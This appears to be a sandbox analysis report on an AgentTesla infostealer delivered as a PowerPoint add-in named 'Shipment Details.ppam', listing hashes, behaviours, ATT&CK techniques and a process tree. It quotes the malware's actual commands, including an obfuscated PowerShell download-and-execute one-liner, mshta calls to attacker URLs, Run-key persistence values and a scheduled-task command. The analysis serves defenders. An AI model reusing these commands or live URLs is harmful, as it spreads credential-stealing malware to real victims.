agenttesla | 4fcca1bce2dd80a24a9def40ab28cc5197e8dd477c2ef77c4d47a19b73fa8bf1

General

Target

Shipment Details.ppam
Size

11KB
MD5

a00323d66feb6d05cb3cfc28ff8c79a9
SHA1

50cb3fa623e7a92553512d4b26f797ed23eab0e4
SHA256

4fcca1bce2dd80a24a9def40ab28cc5197e8dd477c2ef77c4d47a19b73fa8bf1
SHA512

1f2a0f55e62511f2e22c53d814e421f9eafc0d019496a2afd59bde15329a0fb0634bfee6117bd0649c745ceae2b288ea9f28b293dc57ea9a99064a7b06406aeb

Score

10^/10

agenttesla collection keylogger persistence spyware stealer trojan

Malware Config

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

mshta.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	4448	3600	mshta.exe	POWERPNT.EXE

AgentTesla Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1752-322-0x000000000043755E-mapping.dmp	family_agenttesla
behavioral2/memory/3416-389-0x000000000043755E-mapping.dmp	family_agenttesla

Blocklisted process makes network request 13 IoCs

Processes:

mshta.exepowershell.exe

flow	pid	process
26	4448	mshta.exe
30	4448	mshta.exe
36	4448	mshta.exe
38	4448	mshta.exe
41	4448	mshta.exe
42	4448	mshta.exe
44	4448	mshta.exe
45	4448	mshta.exe
47	4448	mshta.exe
49	884	powershell.exe
52	4448	mshta.exe
54	4448	mshta.exe
55	4448	mshta.exe

Drops file in Drivers directory 2 IoCs

Processes:

jsc.exeRegAsm.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	jsc.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	RegAsm.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs

collection

Email Collection

T1114

Processes:

jsc.exeRegAsm.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

mshta.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\takeCare = "pOweRshell.exe -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_8f22087a2c0740eba07c3aea05e107e7.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_959babd593ed4cd49dd3b6a0f1146d59.txt').GetResponse().GetResponseStream()).ReadToend());"	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\SAFEsounkkkd = "\"MsHta\"\"http://1230948%[email protected]/p/13.html\""	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\Milalaasdasdlalal = "\"MsHta\"\"http://1230948%[email protected]/p/13.html\""	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\Cleanreasdasdddsults = "\"MsHta\"\"http://1230948%[email protected]/p/13.html\""	mshta.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

powershell.exe

description	pid	process	target process
PID 884 set thread context of 1752	884	powershell.exe	jsc.exe
PID 884 set thread context of 3416	884	powershell.exe	RegAsm.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

POWERPNT.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	POWERPNT.EXE

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

376 schtasks.exe

pid	process
376	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

POWERPNT.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	POWERPNT.EXE

Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

4452 taskkill.exe
4436 taskkill.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

POWERPNT.EXE

pid process

3600 POWERPNT.EXE

pid	process
4452	taskkill.exe
4436	taskkill.exe

pid	process
3600	POWERPNT.EXE

Suspicious behavior: EnumeratesProcesses 11 IoCs

Processes:

dw20.exepowershell.exejsc.exeRegAsm.exe

pid	process
676	dw20.exe
676	dw20.exe
884	powershell.exe
884	powershell.exe
884	powershell.exe
884	powershell.exe
884	powershell.exe
1752	jsc.exe
1752	jsc.exe
3416	RegAsm.exe
3416	RegAsm.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

Processes:

RegAsm.exe

pid process

3416 RegAsm.exe

pid	process
3416	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

taskkill.exetaskkill.exepowershell.exejsc.exeRegAsm.exe

description	pid	process
Token: SeDebugPrivilege	4452	taskkill.exe
Token: SeDebugPrivilege	4436	taskkill.exe
Token: SeDebugPrivilege	884	powershell.exe
Token: SeDebugPrivilege	1752	jsc.exe
Token: SeDebugPrivilege	3416	RegAsm.exe

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

POWERPNT.EXEjsc.exeRegAsm.exe

pid process

3600 POWERPNT.EXE
1752 jsc.exe
3416 RegAsm.exe

pid	process
3600	POWERPNT.EXE
1752	jsc.exe
3416	RegAsm.exe

Suspicious use of WriteProcessMemory 35 IoCs

Processes:

POWERPNT.EXEmshta.exepowershell.execsc.exe

description	pid	process	target process
PID 3600 wrote to memory of 4448	3600	POWERPNT.EXE	mshta.exe
PID 3600 wrote to memory of 4448	3600	POWERPNT.EXE	mshta.exe
PID 4448 wrote to memory of 4452	4448	mshta.exe	taskkill.exe
PID 4448 wrote to memory of 4452	4448	mshta.exe	taskkill.exe
PID 4448 wrote to memory of 4436	4448	mshta.exe	taskkill.exe
PID 4448 wrote to memory of 4436	4448	mshta.exe	taskkill.exe
PID 4448 wrote to memory of 376	4448	mshta.exe	schtasks.exe
PID 4448 wrote to memory of 376	4448	mshta.exe	schtasks.exe
PID 4448 wrote to memory of 884	4448	mshta.exe	powershell.exe
PID 4448 wrote to memory of 884	4448	mshta.exe	powershell.exe
PID 4448 wrote to memory of 676	4448	mshta.exe	dw20.exe
PID 4448 wrote to memory of 676	4448	mshta.exe	dw20.exe
PID 884 wrote to memory of 2524	884	powershell.exe	jsc.exe
PID 884 wrote to memory of 2524	884	powershell.exe	jsc.exe
PID 884 wrote to memory of 2524	884	powershell.exe	jsc.exe
PID 884 wrote to memory of 1752	884	powershell.exe	jsc.exe
PID 884 wrote to memory of 1752	884	powershell.exe	jsc.exe
PID 884 wrote to memory of 1752	884	powershell.exe	jsc.exe
PID 884 wrote to memory of 1752	884	powershell.exe	jsc.exe
PID 884 wrote to memory of 1752	884	powershell.exe	jsc.exe
PID 884 wrote to memory of 1752	884	powershell.exe	jsc.exe
PID 884 wrote to memory of 1752	884	powershell.exe	jsc.exe
PID 884 wrote to memory of 1752	884	powershell.exe	jsc.exe
PID 884 wrote to memory of 4100	884	powershell.exe	csc.exe
PID 884 wrote to memory of 4100	884	powershell.exe	csc.exe
PID 4100 wrote to memory of 2248	4100	csc.exe	cvtres.exe
PID 4100 wrote to memory of 2248	4100	csc.exe	cvtres.exe
PID 884 wrote to memory of 3416	884	powershell.exe	RegAsm.exe
PID 884 wrote to memory of 3416	884	powershell.exe	RegAsm.exe
PID 884 wrote to memory of 3416	884	powershell.exe	RegAsm.exe
PID 884 wrote to memory of 3416	884	powershell.exe	RegAsm.exe
PID 884 wrote to memory of 3416	884	powershell.exe	RegAsm.exe
PID 884 wrote to memory of 3416	884	powershell.exe	RegAsm.exe
PID 884 wrote to memory of 3416	884	powershell.exe	RegAsm.exe
PID 884 wrote to memory of 3416	884	powershell.exe	RegAsm.exe

outlook_office_path 1 IoCs

Processes:

RegAsm.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe

outlook_win_path 1 IoCs

Processes:

RegAsm.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe

C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\Shipment Details.ppam" /ou ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3600

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" http://www.bitly.com/doaksoodwwdkkdwdasdwmdaweu
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4448

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im winword.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4452

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im Excel.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4436

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_8f22087a2c0740eba07c3aea05e107e7.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_959babd593ed4cd49dd3b6a0f1146d59.txt').GetResponse().GetResponseStream()).ReadToend());
3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:884

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
4⤵
PID:2524

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
4⤵
- Drops file in Drivers directory
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1752

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2hvkwtmj\2hvkwtmj.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:4100

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD1C8.tmp" "c:\Users\Admin\AppData\Local\Temp\2hvkwtmj\CSC10DBE3C1498F43C28944EB5C19306313.TMP"
5⤵
PID:2248

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
- Drops file in Drivers directory
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: SetClipboardViewer
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
PID:3416

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
dw20.exe -x -s 2664
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:676

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""Bluefibonashi"" /F /tr ""\""MsHtA""\""http://1230948%[email protected]/p/13.html\""
3⤵
- Creates scheduled task(s)
PID:376

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Registry Run Keys / Startup Folder

Scheduled Task

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

1

T1112

Credential Access

Credentials in Files

3

T1081

Discovery

Query Registry

2

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Data from Local System

Email Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\2hvkwtmj\2hvkwtmj.dll

MD5
ed1192405ec77e6acf8fd910cba7443c

SHA1
e76764da8bca5608cbddb2de6d6d3fc29d3d5d77

SHA256
8c1fc6ea5dac7b5389d14bee2293a46409257b2034404fa27da0f8b3a434d604

SHA512
cb6253664fa61cec7e1f22404c65a031de2822ac6c5092dc90f99a0621ac870ab5bfa50f43f26cec784be30a36860c6be43aca871d01c8ef25b77e50d73bde6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESD1C8.tmp

MD5
6729c16f6331782277303460067e126f

SHA1
4a9ce4870a1025821773c62fee6c3535f5c30763

SHA256
e1af5fa5890c3b5d66271c785a95a36586d70735b4c72c99d94c23283d1cf6a0

SHA512
c8caffd55c5651e75dc1bf3872b47e0fd9b0197bb3a8c1754eb3964e3256b4fe59a4c6560b5aeba2a06702cbced8aeae439c0cda067d78577d414a4bdc16a4f4

Download Submit
C:\Windows\system32\drivers\etc\hosts

MD5
5b2d17233558878a82ee464d04f58b59

SHA1
47ebffcad0b4c358df0d6a06ef335cb6aab0ab20

SHA256
5b036588bb4cad3de01dd04988af705da135d9f394755080cf9941444c09a542

SHA512
d2aec9779eb8803514213a8e396b2f7c0b4a6f57de1ee84e9db0343ee5ff093e26bb70e0737a6681e21e88898ef5139969ff0b4b700cb6727979bd898fdbc85b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2hvkwtmj\2hvkwtmj.0.cs

MD5
e03b1e7ba7f1a53a7e10c0fd9049f437

SHA1
3bb851a42717eeb588eb7deadfcd04c571c15f41

SHA256
3ca2d456cf2f8d781f2134e1481bd787a9cb6f4bcaa2131ebbe0d47a0eb36427

SHA512
a098a8e2a60a75357ee202ed4bbe6b86fa7b2ebae30574791e0d13dcf3ee95b841a14b51553c23b95af32a29cc2265afc285b3b0442f0454ea730de4d647383f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2hvkwtmj\2hvkwtmj.cmdline

MD5
f3362fcdbbdc3bf35841373892113dde

SHA1
7a771cb099290c3171b7ce0c6ec6544af5e2fb1d

SHA256
05e5289347191f9f031a41886fe2f240e71ab58c17ce4f6f659a032b94817608

SHA512
e4d97045ce25e935fdbc6239bc78cc7b8f037bd4a6b2fa7751af98a6808af71e76401c7ed751c32361299691aa0db4a0fd74a30909c006e44ad0de3e801ae9eb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2hvkwtmj\CSC10DBE3C1498F43C28944EB5C19306313.TMP

MD5
894bc0a26ef07cbe2d192926bede244e

SHA1
a72131f1b62e50c7682e567e9ff897db27bf8d6a

SHA256
0c487a11b87c1301a6c7ed60f529332761cbab1020151868f84c3807aec2beb2

SHA512
576cafd02afed25fbefdda820608f516bc6d913960ea26c22736c585cec3eb74de3d1319f1ed89688b734b93826d19ec1e8a935c24ceb0bc5b9220d13622cc6f

Download Submit
memory/376-295-0x0000000000000000-mapping.dmp

Download
memory/676-297-0x0000000000000000-mapping.dmp

Download
memory/884-302-0x000002673CF90000-0x000002673CF92000-memory.dmp

Filesize
8KB

Download
memory/884-296-0x0000000000000000-mapping.dmp

Download
memory/884-303-0x000002673CF93000-0x000002673CF95000-memory.dmp

Filesize
8KB

Download
memory/884-317-0x000002673CF96000-0x000002673CF98000-memory.dmp

Filesize
8KB

Download
memory/1752-404-0x00000000056B1000-0x00000000056B2000-memory.dmp

Filesize
4KB

Download
memory/1752-322-0x000000000043755E-mapping.dmp

Download
memory/1752-379-0x00000000056B0000-0x00000000056B1000-memory.dmp

Filesize
4KB

Download
memory/2248-383-0x0000000000000000-mapping.dmp

Download
memory/3416-406-0x0000000004E90000-0x000000000538E000-memory.dmp

Filesize
5.0MB

Download
memory/3416-395-0x0000000004E90000-0x000000000538E000-memory.dmp

Filesize
5.0MB

Download
memory/3416-389-0x000000000043755E-mapping.dmp

Download
memory/3600-118-0x00007FFBD7680000-0x00007FFBD7690000-memory.dmp

Filesize
64KB

Download
memory/3600-121-0x000001A3E7960000-0x000001A3E7962000-memory.dmp

Filesize
8KB

Download
memory/3600-119-0x000001A3E7960000-0x000001A3E7962000-memory.dmp

Filesize
8KB

Download
memory/3600-120-0x000001A3E7960000-0x000001A3E7962000-memory.dmp

Filesize
8KB

Download
memory/3600-117-0x00007FFBD7680000-0x00007FFBD7690000-memory.dmp

Filesize
64KB

Download
memory/3600-115-0x00007FFBD7680000-0x00007FFBD7690000-memory.dmp

Filesize
64KB

Download
memory/3600-127-0x00007FFBD7680000-0x00007FFBD7690000-memory.dmp

Filesize
64KB

Download
memory/3600-116-0x00007FFBD7680000-0x00007FFBD7690000-memory.dmp

Filesize
64KB

Download
memory/4100-380-0x0000000000000000-mapping.dmp

Download
memory/4436-290-0x0000000000000000-mapping.dmp

Download
memory/4448-262-0x0000000000000000-mapping.dmp

Download
memory/4452-288-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads